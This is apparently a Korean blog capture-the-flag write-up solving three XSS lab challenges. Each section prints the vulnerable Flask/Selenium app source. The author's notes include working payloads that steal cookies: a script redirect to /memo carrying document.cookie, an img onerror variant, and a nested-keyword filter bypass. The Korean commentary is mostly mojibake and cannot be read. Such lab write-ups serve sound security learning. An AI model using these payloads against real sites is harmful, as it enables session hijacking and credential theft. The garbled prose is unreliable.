[2025-07-10] XSS-1, XSS-2, XSS Filtering Bypass
๐ฆฅ ๋ณธ๋ฌธ
1. XSS - 1
#!/usr/bin/python3
from flask import Flask, request, render_template
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
import urllib
import os
app = Flask(__name__)
app.secret_key = os.urandom(32)
try:
FLAG = open("./flag.txt", "r").read()
except:
FLAG = "[**FLAG**]"
def read_url(url, cookie={"name": "name", "value": "value"}):
cookie.update({"domain": "127.0.0.1"})
try:
service = Service(executable_path="/chromedriver")
options = webdriver.ChromeOptions()
for _ in [
"headless",
"window-size=1920x1080",
"disable-gpu",
"no-sandbox",
"disable-dev-shm-usage",
]:
options.add_argument(_)
driver = webdriver.Chrome(service=service, options=options)
driver.implicitly_wait(3)
driver.set_page_load_timeout(3)
driver.get("http://127.0.0.1:8000/")
driver.add_cookie(cookie)
driver.get(url)
except Exception as e:
driver.quit()
# return str(e)
return False
driver.quit()
return True
def check_xss(param, cookie={"name": "name", "value": "value"}):
url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
return read_url(url, cookie)
@app.route("/")
def index():
return render_template("index.html")
@app.route("/vuln")
def vuln():
param = request.args.get("param", "")
return param
@app.route("/flag", methods=["GET", "POST"])
def flag():
if request.method == "GET":
return render_template("flag.html")
elif request.method == "POST":
param = request.form.get("param")
if not check_xss(param, {"name": "flag", "value": FLAG.strip()}):
return '<script>alert("wrong??");history.go(-1);</script>'
return '<script>alert("good");history.go(-1);</script>'
memo_text = ""
@app.route("/memo")
def memo():
global memo_text
text = request.args.get("memo", "")
memo_text += text + "\n"
return render_template("memo.html", memo=memo_text)
app.run(host="0.0.0.0", port=8000)
- /flag์์๋ POST ๋ฐฉ์์ผ๋ก ๋ณด๋ธ๋ค๋ฉด, ์ฟ ํค๋ฅผ ์ฝ์ ํ๊ณ URL์ ๋ค์ด๊ฐ๋ค. URL์ ๋ค์ด๊ฐ ํ ๋น ์ ธ ๋์จ๋ค. ๊ทธ๋ฆฌ๊ณ ๊ทธ URL์ vuin ํ์ด์ง๋ค.
- ์ฒ์์๋ Burf suite๋ฅผ ํตํด ์ฟ ํค ๊ฐ์ ๊ฐ์ ธ์ค๋ฉด ๋๋ค๊ณ ์๊ฐํ๋ ๋ฐ ์คํจํ๋ค.
- /vuin ์ ์ฌ์ฉ์๊ฐ ์ ๋ ฅํ param ๊ทธ๋๋ก ๋ณด์ฌ์ค๋ค. ๊ทธ๋์ ๋ฅผ ํ๋ ๋ฐ ์คํจํ๋ค.
- memo๋ ์ฌ์ฉ์์๊ฒ ๋ฐ์ ํ ์คํธ๋ค์ ์ ์ฅํ์ฌ ๋ณด์ฌ์ค๋ค.
- POST ๋ฐฉ์์ผ๋ก flag ํ์ด์ง์์ ์ ๊ทผํ์ฌ ์ฟ ํค๋ฅผ ์ฝ์ ํ๋ค. ๊ทธ๋ฆฌ๊ณ ๊ทธ ํ์ด์ง๋ vuin ํ์ด์ง์ด๊ธฐ ๋๋ฌธ์ param์ ๋ณด์ฌ์ฃผ๊ธฐ ๋๋ฌธ์ param์ document.cookie๋ฅผ ํ๋ ๋ฐ ์คํจํ๋ค.
- ๊ฑฐ์ ๋ค ์์๋ ๋ฐ.. ๊ฒฐ๊ตญ ํ์ด๋ฅผ ๋ดค๋ค.
- ๋ฌธ์ ์ ์ ๋ด ๋ธ๋ผ์ฐ์ URL์์ ๋น ์ ธ๋์๋ค๊ฐ ๋๊ฐ๋ ์ค ์์๋ ๋ฐ ๊ทธ๊ฒ ์๋ Selenium์ด๋ผ๋ ์๋ฒ ๋ด๋ถ ๋ธ๋ผ์ฐ์ ๋ก ์คํํ๋ ๊ฑฐ ์๋คโฆ ๊ทธ๋์
<script>
location.href="/memo?memo=" + document.cookie
</script>
- ๋ฅผ ํตํด์ memo api ์คํ์ํค๋ฉด์ ์ฟ ํค๋ฅผ ๋ฉ๋ชจ์ ์ ์ฅํ๋ ๊ฒ์ด์ด์ผ ํ๋ค..
ํ์ด
๋์ ํ๋ฆ
- flag API์์ POST ๋ฐฉ์์ผ๋ก ๋ณด๋ด๋ ๊ฒฝ์ฐ. check_xss๋ฅผ ์คํ
- check_xss๋ ํ๋ผ๋ฏธํฐ๋ก ๋ฐ์ ๊ฒ์ vuln API๋ฅผ ์คํ์ํค๋ URL๋ก ๋ง๋ค๊ณ flag๋ฅผ ์ฟ ํค๋ก ๋ง๋ค์ด์ read_url์ ์คํ
- read_url์ ์ ๋ ๋์ ํตํด ํด๋น ์ฟ ํค๋ก ๋ธ๋ผ์ฐ์ ๋ฅผ ์คํ
- vuln API์์ ํด๋น ํ๋ผ๋ฏธํฐ๋ฅผ ๊ทธ๋๋ก ๋ฆฌํด
- ์๋์ ์ฝ๋๋ฅผ ์ฝ์
<script>
location.href="/memo?memo=" + document.cookie
</script>
- ์ ๋ ๋๋ฅผ ํตํด vuln API์์ ์์ ์คํฌ๋ฆฝํธ๋ฅผ ๊ทธ๋๋ก ๋ฆฌํดํ์ฌ ์คํ
- memo API ์คํ
- memo API์์ document.cookie (์ฆ, FLAG)๋ฅผ memo_text์ ์ ์ฅ
- memo API์์ memo_text๋ฅผ ์ถ๋ ฅํ์ฌ ์ ์ฅ๋ flag๋ฅผ ํ์ธํ ์ ์์
2. XSS - 2
#!/usr/bin/python3
from flask import Flask, request, render_template
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
import urllib
import os
app = Flask(__name__)
app.secret_key = os.urandom(32)
try:
FLAG = open("./flag.txt", "r").read()
except:
FLAG = "[**FLAG**]"
def read_url(url, cookie={"name": "name", "value": "value"}):
cookie.update({"domain": "127.0.0.1"})
try:
service = Service(executable_path="/chromedriver")
options = webdriver.ChromeOptions()
for _ in [
"headless",
"window-size=1920x1080",
"disable-gpu",
"no-sandbox",
"disable-dev-shm-usage",
]:
options.add_argument(_)
driver = webdriver.Chrome(service=service, options=options)
driver.implicitly_wait(3)
driver.set_page_load_timeout(3)
driver.get("http://127.0.0.1:8000/")
driver.add_cookie(cookie)
driver.get(url)
except Exception as e:
driver.quit()
# return str(e)
return False
driver.quit()
return True
def check_xss(param, cookie={"name": "name", "value": "value"}):
url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
return read_url(url, cookie)
@app.route("/")
def index():
return render_template("index.html")
@app.route("/vuln")
def vuln():
return render_template("vuln.html")
@app.route("/flag", methods=["GET", "POST"])
def flag():
if request.method == "GET":
return render_template("flag.html")
elif request.method == "POST":
param = request.form.get("param")
if not check_xss(param, {"name": "flag", "value": FLAG.strip()}):
return '<script>alert("wrong??");history.go(-1);</script>'
return '<script>alert("good");history.go(-1);</script>'
memo_text = ""
@app.route("/memo")
def memo():
global memo_text
text = request.args.get("memo", "")
memo_text += text + "\n"
return render_template("memo.html", memo=memo_text)
app.run(host="0.0.0.0", port=8000)
vuln.html
<div id='vuln'></div>
<script>var x=new URLSearchParams(location.search); document.getElementById('vuln').innerHTML = x.get('param');</script>
- 1์ผ์ฐจ์ ํ์๋ xss-1๊ณผ ๊ฑฐ์ ์ฝ๋๊ฐ ์ ์ฌํ๋ค. ๋ค๋ฅธ ์ ์ vuln api๊ฐ ์๋๋ ๊ทธ๋๋ก param์ ๋ฆฌํดํ๋ ๊ฒ๊ณผ๋ ๋ฌ๋ฆฌ ์ด๋ฒ์๋ html์ ๋ฃ์ด์ ์๋ํ๋ค.
-
๊ทผ๋ฐ ์๋ฌด๋ฆฌ ์๊ฐํด๋ 1์ผ์ฐจ์ ๊ฐ์ ์ฝ๋๋ฅผ ๋ฃ์ผ๋ฉด ์๋๋ ๊ฑฐ ๊ฐ์๋ค.
โ ์คํจํ๋ค. chatgpt์ ๋ฌผ์ด๋ณด๋ dom ๊ตฌ์กฐ ์์ ์๋ script ๋ฌธ์ ๋ณด์์์ ์ด์ ๋ก ์์ฒด์ ์ผ๋ก ๋ง๋ ๋ค๋ ๊ฒ์ด์๋ค.
<img src=x onerror="location.href='/memo?memo=' + document.cookie">
- ์ ์ฝ๋๋ฅผ ๋ฃ์๋๋ ์คํ๋์๋ค. 1์ผ์ฐจ ๋ฌธ์ ๋๋ฌธ์ ๊ธ๋ฐฉ ํ ์ ์์ด์ ๋น๊ต์ ์ฌ์ ๋ค.
ํ์ด
- ์ ๋ ๋ ๋ธ๋ผ์ฐ์ ์์ vuln API๋ฅผ ํธ์ถํ๋ ๊ฒ๊น์ง๋ ๊ฐ๋ค.
- ํ์ง๋ง vuln.html์์ ํ์ฌ ์ฃผ์์ฐฝ์ ์ฟผ๋ฆฌ ์คํธ๋ง(=location.search) ๋ถ๋ถ์ ๊ฐ์ ธ์์ ํ์ฑํ์ฌ x์ ํ ๋นํ๋ค
- ์ฟผ๋ฆฌ ์คํธ๋ง ๋ถ๋ถ์์ param ๋ถ๋ถ์ ๊ฐ์ ธ์์ id๊ฐ vuln์ธ div์ DOM ๊ตฌ์กฐ๋ก ์ฝ์ ํ๋ค
- ๊ทธ ํ vuln.html์ render_template ๋ฉ์๋๋ฅผ ํตํด ๋ ๋๋งํ๋ค.
- ์ด๋ render_template ๋ฉ์๋๋ ์ ๋ฌ๋ ํ ํ๋ฆฟ ๋ณ์๊ฐ ๊ธฐ๋ก๋ ๋ HTML ์ํฐํฐ ์ฝ๋๋ก ๋ณํํด ์ ์ฅ๋์ด XSS๊ฐ ๋ฐ์ํ์ง ์๋๋ค. โ ํ์ง๋ง ํ ํ๋ฆฟ์ ์ด์ฉํ๋ ๋ฐฉ์์ด ์๋๋ผ innerHTML ๋ฐฉ์์ผ๋ก ์ฐํ
- innerHTML์ด์ง๋ง
- ๊ธฐ์กด ๋ฐฉ์์ด ์๋ <img onerror= .. > ๋ฐฉ์์ผ๋ก XSS ๊ฐ๋ฅ
3. XSS Filtering Bypass
#!/usr/bin/python3
from flask import Flask, request, render_template
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
import urllib
import os
app = Flask(__name__)
app.secret_key = os.urandom(32)
try:
FLAG = open("./flag.txt", "r").read()
except:
FLAG = "[**FLAG**]"
def read_url(url, cookie={"name": "name", "value": "value"}):
cookie.update({"domain": "127.0.0.1"})
try:
service = Service(executable_path="/chromedriver")
options = webdriver.ChromeOptions()
for _ in [
"headless",
"window-size=1920x1080",
"disable-gpu",
"no-sandbox",
"disable-dev-shm-usage",
]:
options.add_argument(_)
driver = webdriver.Chrome(service=service, options=options)
driver.implicitly_wait(3)
driver.set_page_load_timeout(3)
driver.get("http://127.0.0.1:8000/")
driver.add_cookie(cookie)
driver.get(url)
except Exception as e:
driver.quit()
# return str(e)
return False
driver.quit()
return True
def check_xss(param, cookie={"name": "name", "value": "value"}):
url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
return read_url(url, cookie)
def xss_filter(text):
_filter = ["script", "on", "javascript:"]
for f in _filter:
if f in text.lower():
text = text.replace(f, "")
return text
@app.route("/")
def index():
return render_template("index.html")
@app.route("/vuln")
def vuln():
param = request.args.get("param", "")
param = xss_filter(param)
return param
@app.route("/flag", methods=["GET", "POST"])
def flag():
if request.method == "GET":
return render_template("flag.html")
elif request.method == "POST":
param = request.form.get("param")
if not check_xss(param, {"name": "flag", "value": FLAG.strip()}):
return '<script>alert("wrong??");history.go(-1);</script>'
return '<script>alert("good");history.go(-1);</script>'
memo_text = ""
@app.route("/memo")
def memo():
global memo_text
text = request.args.get("memo", "")
memo_text += text + "\n"
return render_template("memo.html", memo=memo_text)
app.run(host="0.0.0.0", port=8000)
- ์ด๋ฒ์๋ ํํฐ๋ง์ด ์๊ฒผ๋ค
<sc ript>location.href="/memo?memo=" + document.cookie</sc ript>
<Script>location.href="/memo?memo=" + document.cookie</Script>
<sconript>locatiojavascript:n.href="/memo?memo=" + document.cookie</sconript> //on์ด ""๋ก ๋ฐ๋์ด์ script ์คํ์ด๋ผ๊ณ ์
+ ์์คํค ์ฝ๋๊น์ง
- ํด๋ดค๋ ๋ฐ ์คํจํ๋ค.
- ์์งํ 3๋ฒ์งธ๊ฑฐ๋ ์ ์คํจํ๋ ์ง ์ ๋ง ๋ชจ๋ฅด๊ฒ ๋ค. ์ ๋ง๋ก ๋ต๋ ์์ด์ ๊ณ ๋ฏผํ๋ค๊ฐ ๋ฌธ์ ๋ฅผ ์ฐพ์๋ดค๋ ๋ฐ ๋ ์ฉ????
<scscriptript>locatioonn.href="memo?memo="+document.cookie</scscriptript>
- ํํฐ๋งํ ๋ for ๋ฌธ์ด ๋ฆฌ์คํธ ์์๋๋ก ์คํ๋๋ ๊ฒ ์๋๊ฐ๋ณด๋ค ๊ดํ ์๊ฐ๋ง ๋ง์ด ์ก์๋จน์๋คโฆ
Leave a comment